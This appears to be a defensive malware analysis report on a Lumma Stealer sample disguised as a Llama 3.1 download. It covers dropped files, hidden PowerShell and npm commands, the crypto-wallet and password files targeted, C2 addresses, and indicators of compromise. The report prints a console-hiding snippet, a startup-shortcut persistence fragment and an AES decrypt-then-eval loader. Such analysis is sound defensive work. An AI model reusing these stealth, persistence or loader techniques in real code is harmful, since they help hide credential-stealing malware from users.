LummaStealer Analysis Report: Meet-Llama 3.1

The malware sample under analysis is identified as “Lumma Stealer,” a well-known information-stealing malware. The sample was distributed through SEO poisoning, impersonating legitimate applications like Llama-Meta, often disguised to appear trustworthy to unsuspecting users.

This analysis consolidates findings from both static and dynamic analysis performed on the malicious binaries and associated scripts. The following sections detail the technical indicators and behavior observed during the analysis.

Sample indicators:

1. Initial Executable:

• File name: Liama_3.1.exe
• File location: C:\Users\test\Downloads\Liama_3.1.exe
• SHA-256 Hash: 9e39a555ccb79b2460d9808578ddd17e74754df03d216578202112c8e9506e0a
• File Size: 35.92 MB
• Compiled: 2022–07–09 01:42:38
• Linker: Microsoft Visual Studio C++
• Overlay: Contains JavaScript Bytecode format (suggesting potential use of Node.js during execution)

DiE overview for first binary

Secondary Malware Binary:

• File name: KkHesmkU.exe
• File location: C:\Users\test\AppData\Local\PWHru\hvXoZLnNhv\KkHesmkU.exe
• SHA-256 Hash: 896134a337119b915c0c400b5ff1e093463f28eb679935e21a9da56d8bff2b42
• File Size: 24.61 MB
• Compiled: 2017–05–18 19:25:37
• Linker: Microsoft Linker (EXE32)
• Overlay: C/C++ Binary

DiE overview for second binary

Behavioral Analysis

File Creation Activity:

1. File system manipulation:

• Randomly named directories created in:
• C:\Users\test\AppData\Local\PWHru\hvXoZLnNhv\
• Files created include KkHesmkU.exe and TkEhDYyMi.zip which were soon deleted after execution. The quick deletion is indicative of a "fileless" technique, aiming to hide its trace.
• File decompression: lvRnawWpuv.zip was observed in the C:\Users\test\AppData\Roaming\JkepR\ folder. This archive contains components necessary for executing Node.js-based scripts.

Command Line Activity:

Several suspicious command executions were observed:

1. Suspicious Execution Commands:

• cmd.exe /d /s /c "C:\Users\test\AppData\Local\PWHru\hvXoZLnNhv\KkHesmkU.exe":
  This command runs the main executable from a hidden location within the AppData folder. Malware often hides here to avoid user detection and prevent scrutiny from security software.
• npm config get prefix:
  The malware utilizes Node.js, invoking npm to manipulate its environment or install further malicious modules.
• powershell.exe -WindowStyle Hidden:
  Powershell is invoked in hidden mode, indicating stealthy execution. This is a common tactic used to hide script execution from the user.
• npm install -g nodemon:
  Nodemon, a tool used to automatically restart Node.js applications, is installed. This suggests the malware is designed to run continuously or automatically restart if interrupted.

Command Line Activity

QueryDirectory

In addition to the CreateFile operations, Lumma Stealer executes QueryDirectory commands to search for specific file types and directories that could contain sensitive or valuable information, particularly focusing on cryptocurrency and password-related data. The following is a detailed list of files and directories searched:

Directories and Files Searched by Lumma Stealer:

• Bitcoin: Searching for wallets, transaction history, or seed phrases related to Bitcoin.
• Dashcoin:Queries are directed at directories or files related to Dashcoin wallets or seeds.
• Ethereum: Looking for Ethereum wallets, seeds, and addresses. This includes files used by popular Ethereum clients or decentralized finance applications.
• Ledger: The malware searches for Ledger hardware wallet files or associated software data.
• Metamask: Queries target files linked to Metamask, a popular Ethereum wallet and browser extension.
• Seeds: Searching for seed phrases used in cryptocurrency wallets. These are critical recovery keys for accessing wallets.
• Trezor: Searches for files related to the Trezor hardware wallet, which may include backup or recovery data.
• Wallets: Generic searches for files and directories with the term wallets, covering a wide variety of cryptocurrency wallet types.

Password-related Files:

• *pass.txt: Queries for plain-text password storage files commonly misused by users to store passwords in clear text.
• *passwords.csv: Similar search patterns focusing on common files that could contain exported passwords from browsers or password managers.

Review of folders and files using Procmon

Persistence Mechanism:

A PowerShell script (nydvePtML.ps1) is executed to maintain persistence. Below is a brief breakdown:

1. Hiding Console Window:
   The script hides the Powershell window using API calls to Kernel32.dll and user32.dll, ensuring that it runs without alerting the user:

• Add-Type -Name Window -Namespace Console -MemberDefinition ' [DllImport("Kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);' function Hide-Console { $consolePtr = [Console.Window]::GetConsoleWindow() [Console.Window]::ShowWindow($consolePtr, 0) }

1. Creating a Shortcut for Persistence:
   The script creates a shortcut in the startup directory (C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk) to ensure it re-executes on reboot:

• $targetFile = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $shortcutLocation = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.lnk"

Shortcut for Persistence

Network Communication:

The malware communicates with the following IP addresses, which are known to be associated with command-and-control servers:

• 45.93.20.174
• 104.20.23.46
• 13.69.116.108
• 188.114.97.3
• 104.16.31.34
• 104.16.0.35
• teenaggerwwysm[.]shop

These addresses suggest the malware exfiltrates data and communicates with external servers for further instructions.

JavaScript Obfuscation:

During the static analysis of the index.js file found in C:\Users\test\AppData\Roaming\eAFIYyK, heavy obfuscation was observed. The script included Base64-encoded data, decoded dynamically via Node.js. Here’s an example of de-obfuscation using the crypto module:

var crypto = require("crypto");
var iv = Buffer.from("Ty1xpGUXTk+dBnzHYg/vpg==", "base64");
var decipher = crypto.createDecipheriv("aes-256-cbc", "3hIzo86OcUGcRJn+TKGUOTSdZV+iraVu", iv);
var bodyScript = decipher.update("sFv2MX1bul6jD+i2giByN==", "base64", "utf8");
bodyScript += decipher.final("utf8");
eval(bodyScript);

AES256-CBC decryption process decoded from Index.js

Decrypted Content: The above JavaScript is part of a larger script that facilitates communication with a remote C2 server and exfiltrates sensitive data.

Base64 JS decoded using AES256

Conclusion:

Lumma Stealer showcases sophisticated techniques, including:

• Use of JavaScript and Node.js for script execution: This allows the malware to interact with the system in a stealthy manner, avoiding traditional detection mechanisms.
• Persistence via PowerShell and shortcuts: This ensures the malware remains active even after system reboots.
• Heavy use of obfuscation: Both binary and script-level obfuscation are employed, making it harder to analyze and detect using traditional tools.

The combination of these techniques indicates that Lumma Stealer is a highly evolved information stealer targeting sensitive data such as credentials, wallets, and browser information. Additionally, it takes advantage of Node.js for malware execution, showcasing the growing trend of using legitimate development tools for malicious purposes.

Indicators of Compromise (IOCs)

MD5 Hashes:

• 398DDE90BD45504F5548603CDD7BDB6F
• 13627C1C6C8EA54B8586A935AE2F74C8
• c3cd89c67843e782c07948016ee3d258
• SHA-1 Hash:
• d3644cc57cd50a0d81b77aa1d2d505516feaab2b
• SHA-256 Hashes:
• 9e39a555ccb79b2460d9808578ddd17e74754df03d216578202112c8e9506e0a
• 896134a337119b915c0c400b5ff1e093463f28eb679935e21a9da56d8bff2b42

P Addresses:

• 45[.]93[.]20[.]174
• 104[.]20[.]23[.]46
• 13[.]69[.]116[.]108
• 188[.]114[.]97[.]3
• 104[.]16[.]31[.]34
• 104[.]16[.]0[.]35

Domain:

• teenaggerwwysm[.]shop